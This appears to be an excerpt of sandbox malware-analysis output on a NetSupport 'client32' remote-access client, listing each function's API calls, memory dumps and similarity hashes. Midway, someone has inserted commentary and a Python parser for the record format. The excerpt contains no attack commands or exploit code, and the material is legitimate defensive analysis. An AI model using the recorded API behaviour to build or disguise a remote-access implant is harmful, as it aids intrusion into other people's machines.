• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Xinvalid_argumentstd::_$_memmove
• String ID: string too long
• API String ID: 2168136238-2556327735
• Opcode ID: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
• Instruction ID: dd3894f676f01ff6a75acb4aa2435548b18b289b65f075ee81d5ee4d5d084719
• Opcode Fuzzy Hash: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
• Instruction Fuzzy Hash: 8C31DB72B046108BF720DE9DE88099EF7EDEB957B4B20491FE589C7680E771AC4087A0
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Xinvalid_argument_memmovestd::_
• String ID: string too long
• API String ID: 256744135-2556327735
• Opcode ID: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
• Instruction ID: 4942d9d917c342fdb8aca387283afa0bcd15718542992abc979dc690a8db670a
• Opcode Fuzzy Hash: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
• Instruction Fuzzy Hash: 7931B372B152058F8724DE9EEC848EEF7EAEFD57613104A1FE442C7640DB31AC5187A1
APIs
• _calloc.LIBCMT ref: 1103B162
• _free.LIBCMT ref: 1103B25B
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorExitLastMessageProcess_calloc_freewsprintf
• String ID: CLTCONN.CPP
• API String ID: 183652615-2872349640
• Opcode ID: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
• Instruction ID: 20d7259e8fe77d3daff0af84d5ff1d15e913130fc2269d1c6afd747bd8efee53
• Opcode Fuzzy Hash: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
• Instruction Fuzzy Hash: F231C875A10B069AD310CF95C881BB7F3E4FF44318F048669E9598B641F774F905C3A5
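The records in this part of the report are Joe Sandbox's per-function output for the dropped NetSupport client32 image at base 11000000 and a companion module at base 6CA80000: the imports each function reaches (directly or through a listed subcall), the memory dump the function was carved from, and similarity identifiers. The record just above is the most useful one for triage, because its subcall 11029A70 formats a GetLastError value and shows a MessageBoxA with the caption "Client32" before calling ExitProcess, which is the client's fatal-error path tagged with the source name CLTCONN.CPP. The following is an added example, not code from the report or from Joe Sandbox: a parser for this record layout that groups functions by module base and flags callees that pair MessageBoxA with ExitProcess. The layout assumptions (headings, bullet prefix, "Part of subcall function <addr>:" and "ref: <addr>" syntax) are taken from the records as rendered on this page; the sample text is constructed by copying two of those records with the Associated and hash lines omitted.

```python
# Added example: parse Joe Sandbox per-function records into structured data.
from __future__ import annotations
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample: two records copied from this report, with the Associated
# and Opcode/Instruction hash lines omitted. Every record here has this shape.
SAMPLE = """\
APIs
• _calloc.LIBCMT ref: 1103B162
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorExitLastMessageProcess_calloc_freewsprintf
• String ID: CLTCONN.CPP
• API String ID: 183652615-2872349640
APIs
  • Part of subcall function 6CA9DBD0: _malloc.LIBCMT ref: 6CA9DBE9
• std::exception::exception.LIBCMT ref: 6CA90EEB
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
Similarity
• String ID: PIN
• API String ID: 1338273076-589459321
"""

HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Yara matches", "Similarity"}
# "[Part of subcall function <addr>: ]<name>[(<args>)][,] ref: <addr>"
API_RE = re.compile(r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
                    r"(?P<name>\S+?)(?:\((?P<args>.*?)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)")
BASE_RE = re.compile(r"Offset: (?P<base>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)")

@dataclass
class ApiCall:
    name: str               # e.g. "MessageBoxA.USER32"
    ref: int                # call-site address
    subcall_of: int | None  # callee whose body contains the call; None if direct
    args: str | None        # argument string the sandbox recovered, if any

@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    module_base: int | None = None
    snapshot: str | None = None
    similarity: dict[str, str] = field(default_factory=dict)

def parse_records(text: str) -> list[FunctionRecord]:
    """Each record starts at an 'APIs' heading; bullets belong to the last heading seen."""
    records, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADINGS:
            section = line
            if line == "APIs":
                records.append(FunctionRecord())
            continue
        if not line or not records:
            continue
        rec, item = records[-1], line.lstrip("•").strip()
        key, _, value = item.partition(": ")
        if section == "APIs" and (m := API_RE.fullmatch(item)):
            rec.apis.append(ApiCall(m["name"], int(m["ref"], 16),
                                    int(m["sub"], 16) if m["sub"] else None, m["args"]))
        elif section == "Memory Dump Source" and key == "Source File" and (m := BASE_RE.search(value)):
            rec.module_base = int(m["base"], 16)
        elif section == "Joe Sandbox IDA Plugin" and key == "Snapshot File":
            rec.snapshot = value
        elif section == "Similarity":
            rec.similarity[key] = value
    return records

def group_by_module(records: list[FunctionRecord]) -> dict[int | None, list[FunctionRecord]]:
    """Bucket functions by the base of the PE image they were dumped from."""
    grouped = defaultdict(list)
    for rec in records:
        grouped[rec.module_base].append(rec)
    return dict(grouped)

def fatal_error_handlers(records: list[FunctionRecord]) -> set[int]:
    """Callees that both show a message box and terminate the process,
    i.e. the client's fatal-error path (MessageBoxA 'Client32' then ExitProcess)."""
    names_by_callee = defaultdict(set)
    for rec in records:
        for call in rec.apis:
            if call.subcall_of is not None:
                names_by_callee[call.subcall_of].add(call.name.rsplit(".", 1)[0])
    return {addr for addr, names in names_by_callee.items()
            if {"MessageBoxA", "ExitProcess"} <= names}
```

The "API String ID" is the natural pivot key when comparing against other reports: its first number identifies the set of APIs and its second the string, so the two "string too long" records on this page share the suffix 2556327735 while differing in the API half. Feeding a whole report through parse_records and indexing on that field gives a quick way to see which functions recur between samples of the same family.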
APIs
  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
• std::exception::exception.LIBCMT ref: 1108F7BC
• __CxxThrowException@8.LIBCMT ref: 1108F7D1
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                                    • String ID: L
                                                                                                                                                    • API String ID: 1338273076-2909332022
                                                                                                                                                    • Opcode ID: 95ac659df3cb43b7a394a31561a0db95ca543259b56f7bb8d276c069331ce165
                                                                                                                                                    • Instruction ID: 369f405687447c84649efdd58832c02068d177a3a0274ca2d5cff2ffa4839110
                                                                                                                                                    • Opcode Fuzzy Hash: 95ac659df3cb43b7a394a31561a0db95ca543259b56f7bb8d276c069331ce165
                                                                                                                                                    • Instruction Fuzzy Hash: 9F3160B5D04259AEEB11DFA4C840BDEFBF8FB08314F14426EE915A7280D775A904CBA1
APIs
• _memset.LIBCMT ref: 110AD1E3
  • Part of subcall function 110ACEB0: LoadLibraryA.KERNEL32(Winscard.dll,00000000,00000000,110AD1F3,00000000,00000001,00000000,?,11185738,000000FF,?,110ADC42,?,?,00000200,?), ref: 110ACEC4
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(00000000,SCardEstablishContext), ref: 110ACEE1
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReleaseContext), ref: 110ACEEE
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardIsValidContext), ref: 110ACEFC
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListReadersA), ref: 110ACF0A
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetStatusChangeA), ref: 110ACF18
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardCancel), ref: 110ACF26
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardFreeMemory), ref: 110ACF34
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardConnectA), ref: 110ACF42
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardDisconnect), ref: 110ACF50
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetAttrib), ref: 110ACF5E
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardControl), ref: 110ACF6C
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListCardsA), ref: 110ACF7A
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetCardTypeProviderNameA), ref: 110ACF88
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardBeginTransaction), ref: 110ACF96
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardEndTransaction), ref: 110ACFA4
  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReconnect), ref: 110ACFB2
• FreeLibrary.KERNEL32(00000000,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?,?), ref: 110AD252
Strings
• winscard.dll is NOT valid!!!, xrefs: 110AD1FD
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AddressProc$Library$FreeLoad_memset
• String ID: winscard.dll is NOT valid!!!
• API String ID: 212038770-1939809930
• Opcode ID: 2490663d4c0d4ec01f8a7efd0df3ebe9692d3296733f7b5ae7fba3cdb2ac2a80
• Instruction ID: 57730f506c13caa9e6db9d6f73070caca170ae8d01d94efb838e03e2302413b1
• Opcode Fuzzy Hash: 2490663d4c0d4ec01f8a7efd0df3ebe9692d3296733f7b5ae7fba3cdb2ac2a80
• Instruction Fuzzy Hash: 6521B3B6D40629ABDB10CF95DC44EEFFBB8EB45660F00861AFC15A3340D631A904CBE0
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 1100F2BB
  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
  • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
• std::_Xinvalid_argument.LIBCPMT ref: 1100F2D2
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
• String ID: string too long
• API String ID: 963545896-2556327735
• Opcode ID: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
• Instruction ID: 9c03118c2fef7a30d7f16138fb3dcb5344bdbe7bcaefeaa8633fdbb4ef9eb1a5
• Opcode Fuzzy Hash: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
• Instruction Fuzzy Hash: E711E9737006148FF321D95DA880BAAF7EDEF957B4F60065FE591CB640C7A1A80083A1
APIs
• GetDlgItemTextA.USER32(?,?,?,00000100), ref: 110232D7
• SetDlgItemTextA.USER32(?,?,?), ref: 1102335F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ItemText
• String ID: ...
• API String ID: 3367045223-440645147
• Opcode ID: 3c7fd1be2824b6022330b2e6fcbe42859dc36aafcf172dfa7595ecaab8fe21c6
• Instruction ID: 288fafb08c6b2ba60c27d59f26b93e6fc9d809d534a4309207b318a271e26125
• Opcode Fuzzy Hash: 3c7fd1be2824b6022330b2e6fcbe42859dc36aafcf172dfa7595ecaab8fe21c6
• Instruction Fuzzy Hash: 1121A2756046199BCB24CF68C880FEAF7F9AF99304F1081D9E58997240DAB0AD85CF90
APIs
• ShowWindow.USER32(8D111949,00000009,?,?,?,?,?,?,?,?,?,?,110BA876,110C032C), ref: 110B977B
  • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004C), ref: 110B8AF2
  • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004D), ref: 110B8AF9
  • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004E), ref: 110B8B00
  • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004F), ref: 110B8B07
  • Part of subcall function 110B8AC0: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B8B16
  • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(?), ref: 110B8B24
  • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(00000001), ref: 110B8B33
• MoveWindow.USER32(8D111949,?,?,?,?,00000001), ref: 110B97A3
Strings
• j CB::OnRemoteSizeRestore(%d, %d, %d, %d), xrefs: 110B97BD
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: System$Metrics$Window$InfoMoveParametersShow
                                                                                                                                                    • String ID: j CB::OnRemoteSizeRestore(%d, %d, %d, %d)
                                                                                                                                                    • API String ID: 2940908497-693965840
                                                                                                                                                    • Opcode ID: 60bc414364147a50c916ce8f7c8964549782f9578ddb51fb58b5c7b9b217b13c
                                                                                                                                                    • Instruction ID: 55e82b17da46594b085dc316db9a602337c46ecd43c839d0c1f018f75bd6c70b
                                                                                                                                                    • Opcode Fuzzy Hash: 60bc414364147a50c916ce8f7c8964549782f9578ddb51fb58b5c7b9b217b13c
                                                                                                                                                    • Instruction Fuzzy Hash: DA21E875B0060AAFDB08DFA8C995DBEF7B5FB88304F104268E519A7354DB30AD41CBA4
                                                                                                                                                    APIs
                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 111459F6
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnvironmentExpandFileModuleNameStrings
                                                                                                                                                    • String ID: :
                                                                                                                                                    • API String ID: 2034136378-336475711
                                                                                                                                                    • Opcode ID: 1879a18607367a7fe0ec9fcc5ca715ca320c192212d283e296261fc87c6dfa09
                                                                                                                                                    • Instruction ID: 2f025fe159ad018ca32f107a988c6b97e10c7b7f69d8ea9c63f353a653f43b24
                                                                                                                                                    • Opcode Fuzzy Hash: 1879a18607367a7fe0ec9fcc5ca715ca320c192212d283e296261fc87c6dfa09
                                                                                                                                                    • Instruction Fuzzy Hash: 65213738C043599FDB21CF64CC44FD9BB68AF16708F6041D4D59967942EF706A8DCBA1
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 11043784
                                                                                                                                                    • GetClassNameA.USER32(?,?,00000040), ref: 11043799
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassNameProcessThreadWindow
                                                                                                                                                    • String ID: tooltips_class32
                                                                                                                                                    • API String ID: 2910564809-1918224756
                                                                                                                                                    • Opcode ID: 6d3c4fdc3a6f6e7596f8af0fff3375ada305fabf060d9fd927d6679c10a610bf
                                                                                                                                                    • Instruction ID: 7b66b5eeeba6873e3bd91d5637fb3b576f23a09c5117b8e426f31f0334ec312d
                                                                                                                                                    • Opcode Fuzzy Hash: 6d3c4fdc3a6f6e7596f8af0fff3375ada305fabf060d9fd927d6679c10a610bf
                                                                                                                                                    • Instruction Fuzzy Hash: DF112B71A080599BD711DF74C880AEDFBB9FF55224F6051E9DC819FA40EB71A906C790
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                                                                                      • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                                                                                      • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                                                                                      • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                                                                                      • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                                                                                      • Part of subcall function 110CB9E0: GetDlgItemTextA.USER32(?,?,?,00000400), ref: 110CBA0C
                                                                                                                                                      • Part of subcall function 110CB9E0: SetDlgItemTextA.USER32(?,?,00000000), ref: 110CBA30
                                                                                                                                                    • SetDlgItemTextA.USER32(?,000004BC,?), ref: 11039202
                                                                                                                                                    • _memset.LIBCMT ref: 11039216
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
